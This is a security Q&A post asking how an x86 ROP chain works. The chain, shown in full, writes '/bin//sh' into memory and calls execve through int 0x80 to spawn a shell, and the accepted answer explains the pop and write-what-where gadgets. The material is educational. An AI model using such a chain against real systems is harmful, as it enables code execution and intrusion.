# Understanding a ROP gadget

Tags: security, assembly, x86, buffer-overflow, exploit

I need help understanding how this ROP gadget (shown below) works step by step.
I am really confused as to why the mov and pop instructions are needed here.

```
p = ""
p += pack('<I', 0x08139e7a) # pop edx ; ret
p += pack('<I', 0x081e0060) # @ .data
p += pack('<I', 0x080f3246) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x080d5fc8) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x08139e7a) # pop edx ; ret
p += pack('<I', 0x081e0064) # @ .data + 4
p += pack('<I', 0x080f3246) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x080d5fc8) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x08139e7a) # pop edx ; ret
p += pack('<I', 0x081e0068) # @ .data + 8
p += pack('<I', 0x08061150) # xor eax, eax ; ret
p += pack('<I', 0x080d5fc8) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481f1) # pop ebx ; ret
p += pack('<I', 0x081e0060) # @ .data
p += pack('<I', 0x0819d91d) # pop ecx ; ret
p += pack('<I', 0x081e0068) # @ .data + 8
p += pack('<I', 0x08139e7a) # pop edx ; ret
p += pack('<I', 0x081e0068) # @ .data + 8
p += pack('<I', 0x08061150) # xor eax, eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x080f7a28) # inc eax ; ret
p += pack('<I', 0x0805726e) # int 0x80
```

Comment: A ROP chain is heavily dependent on the context of registers and memory (be it stack, heap, modules location, etc.) at the time the ROP starts. We miss this context. Also, why not just trying to start the ROP chain with a gadget that points to at 0xCC (breakpoint) [or just put a breakpoint when the  exploit should start in your program] and then follow the chain with a debugger. You'd immediately see what's going on in the chain.

Answer (score 2, accepted):

As you already know, this chain is creating parameters for an `execve` system call, which expects a zero terminated program name, a `NULL` terminated argument array and a `NULL` terminated environment array. To create these you need to poke some values into memory, and load some registers. The original author found some useful gadgets for that. `mov dword ptr [edx], eax ; ret` allows you to write an arbitrary dword (which should be in `eax`) into an arbitrary address (which should be in `edx`). To get the values into the registers, the `pop` gadgets can be used since you have control of the stack.

Obviously this isn't the only possible way, if you find other ROP gadgets you can make a different chain.